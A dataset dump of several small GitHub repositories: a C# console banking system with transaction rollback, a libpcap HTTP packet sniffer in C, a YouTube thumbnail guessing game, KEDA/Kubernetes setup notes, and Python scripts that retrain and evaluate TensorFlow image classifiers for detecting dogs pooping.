| branch_name (stringclasses, 149 values) | text (stringlengths, 23 to 89.3M) | directory_id (stringlengths, 40 to 40) | languages (listlengths, 1 to 19) | num_files (int64, 1 to 11.8k) | repo_language (stringclasses, 38 values) | repo_name (stringlengths, 6 to 114) | revision_id (stringlengths, 40 to 40) | snapshot_id (stringlengths, 40 to 40) |
|---|---|---|---|---|---|---|---|---|
refs/heads/main
|
<repo_name>aashlayarora/BankingSystem<file_sep>/005-code.cs
using System;
using System.Collections.Generic;
namespace AbstractedTransaction
{
public class Bank
{
List<Account> _accounts;
List<Transaction> _transactions;
public Bank()
{
_accounts = new List<Account>();
_transactions = new List<Transaction>();
}
public void AddAccount(Account account)
{
_accounts.Add(account);
}
public Account GetAccount(String name)
{
for (int i = 0; i < _accounts.Count; i++)
{
if (name.Equals(_accounts[i].Name))
return _accounts[i];
}
return null;
}
public void ExecuteTransaction(Transaction transaction)
{
_transactions.Add(transaction);
transaction.Execute();
transaction.Print();
}
public void RollbackTransaction(Transaction transaction)
{
transaction.Rollback();
}
public void PrintTransactionHistory()
{
for (int i = 0; i < _transactions.Count; i++)
{
Console.WriteLine("Transaction number:" + i);
Console.Write("status: ");
if (_transactions[i].Reversed)
Console.WriteLine("Reversed");
else if (_transactions[i].Success)
Console.WriteLine("Success");
else if (_transactions[i].Executed)
Console.WriteLine("executed");
Console.WriteLine("\n timestamp: " + _transactions[i].DateStamp);
_transactions[i].Print();
}
}
public Transaction FindTransaction(int transnum)
{
if (transnum < 0 || transnum >= _transactions.Count)
{
throw new InvalidOperationException(" Transaction entered in Invalid");
}
return _transactions[transnum];
}
}
}
<file_sep>/004-code.cs
using System;
namespace AbstractedTransaction
{
public interface TransactonInterface
{
void Print();
void Execute();
void Rollback();
bool Executed { get; }
bool Success { get; }
bool Reversed { get; }
}
enum MenuOption
{
AddAcc = 1,
Withdraw = 2,
Deposit = 3,
Transfer = 4,
Print = 5,
PrintHistory = 6,
Quit = 7
}
public class BankSystem
{
static Account FindAccount(Bank bank)
{
Console.WriteLine("Name of account which you want to find: ");
string n = Console.ReadLine();
Account resacc = bank.GetAccount(n);
if (resacc == null)
Console.WriteLine("Account does'nt exist!");
return resacc;
}
static MenuOption ReadUserInput()
{
int input;
do
{
Console.WriteLine("\nWelcome user!\n");
Console.WriteLine("To:\na)Add account enter'1'\nb)Withdraw enter'2'\nc)Deposit enter'3'\nd)tranfer enter'4'\ne)print enter'5'\nf)Print history enter 6\ng)Quit enter '7'\n enter choice: ");
input = Convert.ToInt32(Console.ReadLine());
} while (input < 1 || input > 7);
MenuOption option = (MenuOption)input;
return option;
}
static void DoprintingHistory(Bank bank)
{
bank.PrintTransactionHistory();
Console.WriteLine("Enter the number of transaction you want to rollback else enter '-1' to exit:");
int num = Convert.ToInt32(Console.ReadLine());
if (num != -1)
DoRollback(num, bank);
}
static void DoRollback(int transnum, Bank bank)
{
bank.RollbackTransaction(bank.FindTransaction(transnum));
}
static void DoWithdraw(Bank bank)
{
Account account = FindAccount(bank);
if (account != null)
{
Console.WriteLine("enter the amount you want to withdraw:");
int amount = Convert.ToInt32(Console.ReadLine());
WithdrawTransaction withdrawal = new WithdrawTransaction(account, amount);
bank.ExecuteTransaction(withdrawal);
}
}
static void DoDeposit(Bank bank)
{
Account account = FindAccount(bank);
if (account != null)
{
Console.WriteLine("enter the amount you want to deposit:");
int amount = Convert.ToInt32(Console.ReadLine());
DepositTransaction deposit = new DepositTransaction(account, amount);
bank.ExecuteTransaction(deposit);
}
}
static void DoTransfer(Bank bank)
{
Console.WriteLine("Withdrawl account:");
Account fromaccount = FindAccount(bank);
Console.WriteLine("Deposit account:");
Account toaccount = FindAccount(bank);
if (fromaccount != null && toaccount != null)
{
Console.WriteLine("enter the amount you want to transfer:");
int amount = Convert.ToInt32(Console.ReadLine());
TransferTransaction transfer = new TransferTransaction(fromaccount, toaccount, amount);
bank.ExecuteTransaction(transfer);
}
}
static void Print(Bank bank)
{
Account acc = FindAccount(bank);
if (acc != null)
acc.Print();
}
static void DoAddAccount(Bank bank)
{
Console.WriteLine("Name of account for which you want to add: ");
string n = Console.ReadLine();
Console.WriteLine("Enter balance in the account: ");
decimal b = Convert.ToDecimal(Console.ReadLine());
Account acc = new Account(b, n);
bank.AddAccount(acc);
}
public static void Main(string[] args)
{
int break_ = 0;
Bank bank = new Bank();
while (break_ != 1)
{
MenuOption option = ReadUserInput();
Console.WriteLine("YOU SELECTED TO" + option + "\n" + "To Change enter '1' else '0':");
int cnfrm = Convert.ToInt32(Console.ReadLine());
if (cnfrm == 1)
{
option = ReadUserInput();
Console.WriteLine("YOU SELECTED TO" + option + "\n");
}
try
{
switch (option)
{
case MenuOption.AddAcc:
{
DoAddAccount(bank);
break;
}
case MenuOption.Withdraw:
{
DoWithdraw(bank);
break;
}
case MenuOption.Deposit:
{
DoDeposit(bank);
break;
}
case MenuOption.Transfer:
{
DoTransfer(bank);
break;
}
case MenuOption.Print:
{
Print(bank);
break;
}
case MenuOption.PrintHistory:
{
DoprintingHistory(bank);
break;
}
case MenuOption.Quit:
{
break_ = 1;
break;
}
}
}
catch (InvalidOperationException err)
{
Console.WriteLine(err.Message);
}
}
}
}
}
<file_sep>/000-code.cs
using System;
namespace AbstractedTransaction
{
public class DepositTransaction : Transaction, TransactonInterface
{
Account _account;
public override bool Success
{
get { return _success; }
// set { _success = value; }
}
public DepositTransaction(Account account, decimal amount) : base(amount)
{
_account = account;
}
public override void Print()
{
if (Executed)
{
Console.WriteLine("transaction was executed..");
if (Success)
{
Console.WriteLine("transaction success..amount of" + _amount + "was deposited");
}
else if (Reversed)
{
Console.WriteLine("transaction unsuccessful.. rolling back..");
}
else
{
Console.WriteLine("transaction unsuccessful..");
}
}
else
Console.WriteLine("transaction wasn't executed..");
}
public override void Execute()
{
base.Execute();
if (Executed)
throw new InvalidOperationException("transaction already executed..");
else
{
if (_account.Deposit(_amount))
{
_success = true;
base.setExecute();
}
else
throw new InvalidOperationException("amount entered is invalid..");
}
}
public override void Rollback()
{
base.Rollback();
if (!Success)
{
throw new InvalidOperationException("Transaction didn't take place");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction roll back already done!");
}
else if (Success && !Reversed)
{
_account.Withdraw(_amount);
base.setReverse();
}
}
}
}
<file_sep>/006-code.cs
using System;
namespace AbstractedTransaction
{
public class Account
{
decimal _balance;
string _name;
public string Name
{
get { return _name; }
set { _name = value; }
}
public decimal Balance
{
get
{
return _balance;
}
}
public Account(decimal balance, string name)
{
Name = name;
_balance = balance;
}
public bool Deposit(decimal amount)
{
if (amount > 0)
{
_balance += amount;
return true;
}
else
{
return false;
}
}
public bool Withdraw(decimal amount)
{
if (_balance >= amount && amount > 0)
{
_balance -= amount;
return true;
}
else
{
return false;
}
}
public void Print()
{
Console.WriteLine("Name of account in which transactions happened: {0}", _name);
Console.WriteLine("After transaction: Updated Balance is: ${0}", _balance.ToString("C"));
}
}
}<file_sep>/001-code.cs
using System;
namespace AbstractedTransaction
{
public class WithdrawTransaction : Transaction, TransactonInterface
{
Account _account;
public override bool Success
{
get { return _success; }
//set { _success = value; }
}
public WithdrawTransaction(Account account, decimal amount) : base(amount)
{
_account = account;
_amount = amount;
}
public override void Print()
{
if (Executed)
{
Console.WriteLine("transaction executed..");
if (Success)
{
Console.WriteLine("sucess! an amount of " + _amount + "is withdrawn from your account");
}
else if (Reversed)
{
Console.WriteLine("transaction unsuccessfull! rolling back success");
}
else
{
Console.WriteLine("transaction unsuccessful");
}
}
else
{
Console.WriteLine("transaction couldn't take place");
}
}
public override void Execute()
{
base.Execute();
if (Executed)
throw new InvalidOperationException("the transaction has been already executed!");
else
{
if (_account.Withdraw(_amount))
{
// Console.WriteLine("fgjgk");
_success = true;
base.setExecute();
}
else
throw new InvalidOperationException(" insufficient funds!!");
}
}
public override void Rollback()
{
base.Rollback();
if (!_success)
{
throw new InvalidOperationException("Transaction didn't take place");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction roll back already done!");
}
else if (_success && !Reversed)
{
_account.Deposit(_amount);
base.setReverse();
}
}
}
}
<file_sep>/002-code.cs
using System;
namespace AbstractedTransaction
{
public class TransferTransaction : Transaction, TransactonInterface
{
Account _fromAccount;
Account _toAccount;
DepositTransaction _deposit;
WithdrawTransaction _withdraw;
public override bool Success
{
get
{
if (_deposit.Success && _withdraw.Success)
{
return true;
}
return false;
}
}
public TransferTransaction(Account fromAccount, Account toAccount, decimal amount) : base(amount)
{
_fromAccount = fromAccount;
_toAccount = toAccount;
DepositTransaction deposit = new DepositTransaction(toAccount, amount);
_deposit = deposit;
WithdrawTransaction withdraw = new WithdrawTransaction(fromAccount, amount);
_withdraw = withdraw;
}
public override void Print()
{
if (Success)
{
Console.WriteLine("Transferred $" + _amount + " from " + _fromAccount.Name + " to " + _toAccount.Name);
_withdraw.Print();
_deposit.Print();
}
else if (Reversed)
Console.WriteLine("transaction rolled back..");
else
Console.WriteLine("Transaction unsuccessfull!");
}
public override void Execute()
{
base.Execute();
if (Executed)
{
throw new InvalidOperationException("The transfer transaction has been already attempted");
}
if (_amount > _fromAccount.Balance)
{
throw new InvalidOperationException("Insuffiecient funds!");
}
_withdraw.Execute();
if (_withdraw.Success)
{
_deposit.Execute();
if (!_deposit.Success)
{
_withdraw.Rollback();
}
}
base.setExecute();
}
public override void Rollback()
{
base.Rollback();
if (!Success)
{
throw new InvalidOperationException("Transaction wasn't success..");
}
else if (Reversed)
{
throw new InvalidOperationException("Transaction already rolled back. .");
}
else
{
_deposit.Rollback();
_withdraw.Rollback();
base.setReverse();
}
}
}
}
<file_sep>/003-code.cs
using System;
namespace AbstractedTransaction
{
public abstract class Transaction
{
protected decimal _amount;
protected bool _success;
private bool _executed;
private bool _reversed;
DateTime _dateStamp;
abstract public bool Success
{ get; }
public bool Executed
{
get { return _executed; }
}
public bool Reversed
{
get { return _reversed; }
}
public DateTime DateStamp
{
get { return _dateStamp; }
}
public Transaction(decimal amount)
{
_amount = amount;
}
public abstract void Print();
public virtual void Execute()
{
_dateStamp = DateTime.Now;
}
public virtual void Rollback()
{
_dateStamp = DateTime.Now;
}
public void setExecute()
{
_executed = true;
}
public void setReverse()
{
_reversed = true;
}
}
}
<file_sep>/README.md
# BankingSystem
A complete, functional banking system written in C# that supports creating multiple accounts, withdrawing, depositing, transferring between two different accounts, printing statements before and after transactions, rolling back transactions in case of discrepancies, and using error and exception handling to minimize the effort
|
47cb715504cc5aa7d63a81a9ac78188a4312357d
|
[
"Markdown",
"C#"
] | 8
|
C#
|
aashlayarora/BankingSystem
|
31cd20434e9f17eec64f7d97a50cf2814e0d05cc
|
1fbddce2da868407bc13cceeb77d6e351688eb4b
|
refs/heads/main
|
<repo_name>renatogroffe/Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods<file_sep>/keda-instalacao.sh
kubectl create namespace keda
helm repo add kedacore https://kedacore.github.io/charts
helm install keda kedacore/keda --namespace keda<file_sep>/README.md
# Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods
Objects for the Deployment of a Worker Service (access counting) on Kubernetes using KEDA, Helm, Azure Service Bus (Queue) and a Worker built with .NET 6. A ScaledObject was defined with a minimum of 1 and a maximum of 10 Pods.
Worker Service that consumes **messages bound to an Azure Service Bus queue** (image **renatogroffe/workercontagem-servicebusqueue-dotnet6**) - this is the application that will be scaled via **KEDA**:
**https://github.com/renatogroffe/DotNet6-WorkerService-AzureServiceBus-SqlServer_ContagemAcessos**
Project that served as the basis for **sending messages to an Azure Service Bus queue** (image **renatogroffe/apicontagem-servicebusqueue-dotnet6**):
**https://github.com/renatogroffe/ASPNETCore6-REST_API-AzureServiceBus_ContagemAcessos**
The file **keda-instalacao.sh** contains the instructions for installing KEDA **(Kubernetes Event-driven Autoscaling)** on a **Kubernetes cluster**.
For the load tests that scale the application I used the npm package [**loadtest**](https://www.npmjs.com/package/loadtest). The example below sends **3,000 requests**, simulating **50 concurrent users**:
**loadtest -c 50 -n 3000 -k** ***ENDPOINT***
|
9a9f52a2a80c9d1578fa92d4d08de30f12a58f5d
|
[
"Markdown",
"Shell"
] | 2
|
Shell
|
renatogroffe/Kubernetes-KEDA-ServiceBusQueue_ContagemAcessos_1-10_Pods
|
f9d456d82f0094f96c9b6b8fffac51a36c9a0c63
|
9cae016ea48cbc38e8b23188438f1d39fc908d56
|
HEAD
|
<file_sep>{
"version": 1495721860,
"fileList": [
"data.js",
"c2runtime.js",
"jquery-2.1.1.min.js",
"offlineClient.js",
"images/tankcat-sheet0.png",
"images/tankcat-sheet1.png",
"images/tankcat-sheet2.png",
"images/tiledbackground.png",
"images/btnright-sheet0.png",
"images/btnleft-sheet0.png",
"images/newpiskel-sheet0.png",
"images/particles.png",
"images/newpiskel2-sheet0.png",
"images/newpiskel3-sheet0.png",
"images/tiledbackground2.png",
"images/bulletball-sheet0.png",
"images/explode-sheet0.png",
"images/explode-sheet1.png",
"images/badheli-sheet0.png",
"images/badheli-sheet1.png",
"images/deskp-sheet0.png",
"images/mon-sheet0.png",
"images/kitch-sheet0.png",
"images/bed-sheet0.png",
"images/tiledbackground3.png",
"images/door-sheet0.png",
"images/tv-sheet0.png",
"images/speak-sheet0.png",
"images/health-sheet0.png",
"images/newpiskel4-sheet0.png",
"images/jetkill-sheet0.png",
"images/car-sheet0.png",
"images/tankcatfake-sheet0.png",
"images/sprite3-sheet0.png",
"images/sprite3-sheet1.png",
"images/sprite3-sheet2.png",
"images/50point-sheet0.png",
"images/pointpart.png",
"images/crate-sheet0.png",
"images/jet-sheet0.png",
"images/sprite-sheet0.png",
"images/newpiskel5-sheet0.png",
"images/bullet-sheet0.png",
"images/catjetbutton-sheet0.png",
"images/specials-sheet0.png",
"images/sprite2-sheet0.png",
"images/lasersp-sheet0.png",
"images/smenuback-sheet0.png",
"images/lasermessage-sheet0.png",
"images/coin-sheet0.png",
"images/title2-sheet0.png",
"images/tiledbackground4.png",
"images/newpiskel6-sheet0.png",
"images/sprite4-sheet0.png",
"images/shoplogo2-sheet0.png",
"images/homebutton-sheet0.png",
"images/buybutton-sheet0.png",
"images/buybutton-sheet1.png",
"images/fasttank-sheet0.png",
"images/jump-sheet0.png",
"images/wash-sheet0.png",
"images/sprite5-sheet0.png",
"images/sprite5-sheet1.png",
"images/mapor-sheet0.png",
"images/blanksp-sheet0.png",
"images/pause-sheet0.png",
"images/exit-sheet0.png",
"images/dtaptojump-sheet0.png",
"images/tiledbackground7.png",
"images/loading-sheet0.png",
"images/forcefield-sheet0.png",
"images/buyff-sheet0.png",
"images/holdff-sheet0.png",
"images/burn.png",
"images/back-sheet0.png",
"images/yourscore-sheet0.png",
"images/submitscore-sheet0.png",
"images/showscore-sheet0.png",
"media/explode.m4a",
"media/explode.ogg",
"media/hit.m4a",
"media/hit.ogg",
"media/shoot.m4a",
"media/shoot.ogg",
"media/jet.m4a",
"media/jet.ogg",
"media/point.m4a",
"media/point.ogg",
"media/spawn.m4a",
"media/spawn.ogg",
"media/powerup.m4a",
"media/powerup.ogg",
"media/laser_shoot.m4a",
"media/laser_shoot.ogg",
"media/laser.m4a",
"media/laser.ogg",
"loading-logo.png",
"icon-16.png",
"icon-32.png",
"icon-114.png",
"icon-128.png",
"icon-256.png",
"cordova.oauth2.js"
]
}<file_sep>var youtubeVids = [];
var mostPop = '';
var mostPopName = '';
var searchDone = false;
var guessed = false;
function loadGame(){
var userInput = document.getElementById('youtubeInput').value;
var youtubeAPI = "https://www.googleapis.com/youtube/v3/search?part=snippet&q=" + userInput + "®ionCode=gb&order=viewCount&type=video&maxResults=8&key=<KEY>"
var xhttp = new XMLHttpRequest();
xhttp.onreadystatechange = function() {
if (this.readyState == 4 && this.status == 200) {
// Typical action to be performed when the document is ready:
var youtubeData = JSON.parse(xhttp.responseText);
youtubeVids.push(youtubeData.items[0].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[1].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[2].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[3].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[4].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[5].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[6].snippet.thumbnails.high.url);
youtubeVids.push(youtubeData.items[7].snippet.thumbnails.high.url);
mostPop = (youtubeData.items[0].snippet.thumbnails.high.url);
mostPopName = (youtubeData.items[0].snippet.title);
console.log(mostPop);
console.log(mostPopName);
searchDone = true;
guessed = false;
reset()
setImg()
}
};
xhttp.open("GET", youtubeAPI, true);
xhttp.send();
}
function setImg(){
var randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb1").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb2").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb3").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb4").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb5").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb6").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb7").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
randomInList = Math.floor(Math.random() * (youtubeVids.length)) + 0
document.getElementById("thumb8").src = youtubeVids[randomInList];
youtubeVids.splice(randomInList,1);
document.getElementById("results").style.display = "block";
document.getElementById("question").innerHTML = "Which of the following do you think got the most views?"
}
function checkForCorrect(){
var count = 1;
while (document.getElementById("thumb"+count).src != mostPop){
count += 1;
}
return count;
}
function guess(selection){
if (guessed == false){
guessed = true;
if (document.getElementById("thumb"+selection).src == mostPop){
document.getElementById("thumb"+checkForCorrect()).style.transform = "scale(1.2)"
document.getElementById("question").innerHTML = "That's correct!! '"+mostPopName+"' was the the most popular."
}
else{
document.getElementById("thumb"+checkForCorrect()).style.transform = "scale(1.2)"
document.getElementById("question").innerHTML = "Sorry, it was '"+mostPopName+"'. Try another search term."
}
}
}
function reset(){
var pic = 1
while (pic <= 8){
document.getElementById("thumb"+pic).style.transform = ""
pic += 1
}
}
|
a7a3201e6c878c3198cd9324ce13a4056afde8a4
|
[
"JavaScript"
] | 2
|
JavaScript
|
debelsoftware/videorank
|
e8400ab4124aa3bda8bf6b8897d33a981dd92916
|
642b7dd075e0da330038ad3fa6251a660f8e7410
|
refs/heads/main
|
<repo_name>sajaalraja/arrow-function<file_sep>/app.js
"use strict"
let sayhi;
sayhi = () => {
return "hi";
}
document.getElementById("arrow").innerHTML = sayhi();
|
ad0430f1ec70e1580a614762dfbbda5eb01e0261
|
[
"JavaScript"
] | 1
|
JavaScript
|
sajaalraja/arrow-function
|
ab16bad09cbf685c010d1170333c96dc5cb5e62e
|
54c055ba4e6e82accd7fd67d8b5934d80a84afef
|
refs/heads/master
|
<repo_name>Kur0N3k0/pcap_prog<file_sep>/Makefile
all : pcap_prog
LIBS = pcap
pcap_prog :
gcc -o pcap pcap.c -l$(LIBS)
clean :
rm -f pcap
<file_sep>/pcap.c
#include <pcap.h>
#include <stdio.h>
#include <ctype.h>
#include <stdint.h>
#include <arpa/inet.h>
#include <net/ethernet.h>
#include <netinet/in.h>
typedef struct ethernet{
uint8_t dest[6];
uint8_t src[6];
uint16_t type;
} ethernet;
typedef struct ip{
uint8_t hdr_len:4;
uint8_t version:4;
uint8_t tos;
uint16_t total_len;
uint16_t id;
uint8_t ip_frag_offset:5;
uint8_t ip_more_fragment:1;
uint8_t ip_dont_fragment:1;
uint8_t ip_reserved_zero:1;
uint8_t ip_frag_offset1;
uint8_t ip_ttl;
uint8_t ip_protocol;
uint16_t ip_checksum;
struct in_addr ip_srcaddr;
struct in_addr ip_destaddr;
} ip;
typedef struct tcp{
uint16_t source_port;
uint16_t dest_port;
uint32_t sequence;
uint32_t acknowledge;
uint8_t ns:1;
uint8_t reserved_part1:3;
uint8_t data_offset:4;
uint8_t fin:1;
uint8_t syn:1;
uint8_t rst:1;
uint8_t psh:1;
uint8_t ack:1;
uint8_t urg:1;
uint8_t ecn:1;
uint8_t cwr:1;
uint16_t window;
uint16_t checksum;
uint16_t urgent_pointer;
} tcp;
void getmac(const char *byte){
int i;
for(i = 0; i < 5; i++)
printf("%02x:", *(uint8_t *)&byte[i]);
printf("%02x\n", *(uint8_t *)&byte[i]);
}
int main(int argc, char *argv[])
{
pcap_t *handle; /* Session handle */
char *dev; /* The device to sniff on */
char errbuf[PCAP_ERRBUF_SIZE]; /* Error string */
struct bpf_program fp; /* The compiled filter */
char filter_exp[] = "port 80"; /* The filter expression */
bpf_u_int32 mask; /* Our netmask */
bpf_u_int32 net; /* Our IP */
struct pcap_pkthdr *header; /* The header that pcap gives us */
ethernet *eth;
ip *iph;
tcp *tcph;
char *buf = NULL;
//const u_char *packet; /* The actual packet */
int res;
int i;
if(argc != 2){
printf("[Usage] ./pcap [network_device]\n");
return 0;
}
/* Open the session in promiscuous mode */
handle = pcap_open_live(argv[1], BUFSIZ, 1, 1000, errbuf);
if (handle == NULL) {
fprintf(stderr, "Couldn't open device %s: %s\n", dev, errbuf);
return(2);
}
/* Compile and apply the filter */
if (pcap_compile(handle, &fp, filter_exp, 0, PCAP_NETMASK_UNKNOWN) == -1) {
fprintf(stderr, "Couldn't parse filter %s: %s\n", filter_exp, pcap_geterr(handle));
return(2);
}
if (pcap_setfilter(handle, &fp) == -1) {
fprintf(stderr, "Couldn't install filter %s: %s\n", filter_exp, pcap_geterr(handle));
return(2);
}
char ip_src[17] = { 0, };
char ip_dst[17] = { 0, };
while(1){ /* Grab a packet */
res = pcap_next_ex(handle, &header, (const u_char **)&eth);
if(res <= 0)
continue;
if (ntohs(eth->type) != ETHERTYPE_IP){
printf("Not IP type! %x\n", eth->type);
continue;
}
iph = (ip *)((char *)eth + sizeof(ethernet));
inet_ntop(AF_INET, (const char *)&iph->ip_srcaddr, ip_src, 17);
inet_ntop(AF_INET, (const char *)&iph->ip_destaddr, ip_dst, 17);
if (iph->ip_protocol != IPPROTO_TCP){
printf("Not tcp protocol! %x\n", iph->ip_protocol);
continue;
}
tcph = (tcp *)((char *)iph + iph->hdr_len * 4);
unsigned int data_len = ntohs(iph->total_len);
unsigned int off = tcph->data_offset * 4 + iph->hdr_len * 4;
if(data_len <= off){
continue;
}
else data_len -= off;
printf("source mac : ");
getmac(eth->src);
printf("dest mac : ");
getmac(eth->dest);
printf("source ip : %s\n", ip_src);
printf("dest ip : %s\n", ip_dst);
printf("source port : %d\n", ntohs(tcph->source_port));
printf("dest port : %d\n", ntohs(tcph->dest_port));
buf = (char *)((char *)tcph + tcph->data_offset * 4);
for(i = 0; i < data_len; i++){
if(isprint(buf[i]))
printf("%c", buf[i]);
else
printf(".");
}
puts("");
}
pcap_close(handle);
return(0);
}
|
5f6b846f17b3cf2d0c39582c3d2b85c37fdad999
|
[
"C",
"Makefile"
] | 2
|
Makefile
|
Kur0N3k0/pcap_prog
|
93b77a90eade01ad3ef46bfbd7a84a3eb9d92f14
|
891570809883fead61b453abc4a1ae29a5e52b22
|
refs/heads/master
|
<file_sep>import retrain as r
import sys
import json
import os
from pathlib import Path
model_list = []
cur_path = Path(os.getcwd())
base_dir = cur_path.parent
code_dir = str(cur_path)
image_dir = os.path.join(base_dir, "Images")
with open("./pooMeta.json") as f:
model_list = json.load(f)
print(model_list)
for model in model_list:
model_dir = os.path.join(base_dir, "models\\"+model["model"]+"\\"+model["iteration"])
module = model["module"]
model_name = model["model"]
iteration = model["iteration"]
number_of_steps = model["number_of_steps"]
summaries_dir = os.path.join(model_dir, model["summaries_dir"])
output_labels = os.path.join(model_dir, model["output_labels"])
output_graph = os.path.join(model_dir, model["output_graph"])
random_crop = model["random_crop"]
random_brightness = model["random_brightness"]
sys.argv = (
['./retrain.py', '--image_dir', image_dir,
'--how_many_training_steps', number_of_steps,
'--tfhub_module', module,
'--summaries_dir', summaries_dir,
'--output_labels', output_labels,
'--output_graph', output_graph,
'--random_crop', random_crop,
'--random_brightness', random_brightness,
]
)
r.run_app()
<file_sep># Dog_Pooping_Recognition
Image recognition project to predict whether a dog was pooping or not. The idea would be to use it as part of a product to hold pet owners accountable for picking up after their dogs, creating cleaner public spaces.
<file_sep>import os
import label_image as li
import json
def main():
models = ["Resnet2","Resnet3","Resnet4","Inception2","Inception3","Inception4","Mobilenet2","Mobilenet3","Mobilenet4"]
res = [224,224,224,299,299,299,224,224,224]
#Resnet (224 X 224)
#Inception (299 X 299)
#Mobilenet (224 X 224)
mydir = "G:/My Drive/Analytic Apps/DApps_Project/Test_Images/"
# Read in actuals
with open("actuals.json", "r") as read_file: # change this line to actuals.json once done testing
actuals = json.load(read_file)
actuals = actuals[0]
#print(actuals)
# Get a list of all the test images
images = list(actuals.keys())
#print(images)
# Create a dictionary to store predictions for each model
preds = {}
# Loop through all the models
for m in range(len(models)):
model = models[m][:-1]
print(model)
num = models[m][-1:]
print(num)
# Loop through all the images
for dirs, subdirs, files in os.walk(mydir):
for f in files:
print(f)
# Build path to test image, model graph, and model label
if f == "desktop.ini":
continue
image = dirs + f
graph = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +model +"/" +num +"/output_graph.pb"
labels = "G:/My Drive/Analytic Apps/DApps_Project/Models/" +model +"/" +num +"/output_labels.txt"
#print(graph)
#print(labels)
# Get the predicted classes
if models[m] not in preds.keys():
preds[models[m]] = {}
preds[ models[m] ][ f ] = li.label_image(graph=graph, labels=labels, image=image, height=res[m], width=res[m])
else:
preds[ models[m] ][ f ] = li.label_image(graph=graph, labels=labels, image=image, height=res[m], width=res[m])
#print(preds)
# Get the total number of images
total = len(images)
#print(total)
# Create a dictionary to store the accuracy scores for each model tuned on three different learning rates
acc_obj = {}
# Loop through each model to create a confusion matrix, accuracy, recall, and precision score and write it out to a file
for mod in models:
model = mod[:-1]
#print(model)
# Create a 2D list to store the confusion matrix for each model
cf = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
# Fill in the confusion matrix
for img in images:
if preds[mod][img] == 'dog pooping' and actuals[img] == 'dog pooping':
cf[0][0] += 1
elif preds[mod][img] == 'dog pooping' and actuals[img] == 'dog not pooping':
cf[0][1] += 1
elif preds[mod][img] == 'dog not pooping' and actuals[img] == 'dog pooping':
cf[1][0] += 1
elif preds[mod][img] == 'dog not pooping' and actuals[img] == 'dog not pooping':
cf[1][1] += 1
#print(cf)
# Calculate the metrics for the model based on the confusion matrix
accuracy = (cf[0][0] + cf[1][1]) / total
recall = cf[0][0] / (cf[0][0] + cf[1][0])
precision = cf[0][0] / (cf[0][0] + cf[0][1])
#print('Accuracy:', accuracy)
#print('Recall:', recall)
#print('Precision:', precision)
# Fill the accuracy dictionary
if model not in acc_obj.keys():
acc_obj[model] = [accuracy]
else:
acc_obj[model].append(accuracy)
# Write the confusion matrix and metrics out to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results2/" +mod, "w")
out.write(mod +" Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf[0][0]) +" " +str(cf[0][1]) +"\n")
out.write(str(cf[1][0]) +" " +str(cf[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy) +"\n")
out.write("Recall\n")
out.write(str(recall) +"\n")
out.write("Precision\n")
out.write(str(precision) +"\n")
out.close()
print(acc_obj)
# Score the ensemble model
# # Create a list that contains the which iteration of each model is the best in terms of accuracy
best_mods = []
for k,v in acc_obj.items():
b_mod = k + str(v.index(max(v))+2)
best_mods.append(b_mod)
print(best_mods)
ens_preds = {}
for image in images:
dp_cnt = 0
dnp_cnt = 0
for model in best_mods:
if preds[model][image] == 'dog pooping':
dp_cnt += 1
else:
dnp_cnt += 1
if dp_cnt > dnp_cnt:
ens_preds[image] = 'dog pooping'
else:
ens_preds[image] = 'dog not pooping'
print(ens_preds)
# Create a confusion matrix for the ensemble model
cf_ens = [ #Actual
[0,0], #Predicted - DP
[0,0] # - DNP
]
for im in images:
if ens_preds[im] == 'dog pooping' and actuals[im] == 'dog pooping':
cf_ens[0][0] += 1
elif ens_preds[im] == 'dog pooping' and actuals[im] == 'dog not pooping':
cf_ens[0][1] += 1
elif ens_preds[im] == 'dog not pooping' and actuals[im] == 'dog pooping':
cf_ens[1][0] += 1
elif ens_preds[im] == 'dog not pooping' and actuals[im] == 'dog not pooping':
cf_ens[1][1] += 1
# print(cf_ens)
# print()
# Calculate the metrics for the model
accuracy_ens = (cf_ens[0][0] + cf_ens[1][1]) / total
recall_ens = cf_ens[0][0] / (cf_ens[0][0] + cf_ens[1][0])
precision_ens = cf_ens[0][0] / (cf_ens[0][0] + cf_ens[0][1])
# print('Accuracy:', accuracy_ens)
# print('Recall:', recall_ens)
# print('Precision:', precision_ens)
# Write the confusion matrix and metrics out to a text file
out = open("G:/My Drive/Analytic Apps/DApps_Project/Results2/Ensemble", "w")
out.write("Ensemble Results\n")
out.write("Confusion Matrix\n")
out.write(str(cf_ens[0][0]) +" " +str(cf_ens[0][1]) +"\n")
out.write(str(cf_ens[1][0]) +" " +str(cf_ens[1][1]) +"\n")
out.write("Accuracy\n")
out.write(str(accuracy_ens) +"\n")
out.write("Recall\n")
out.write(str(recall_ens) +"\n")
out.write("Precision\n")
out.write(str(precision_ens) +"\n")
out.close()
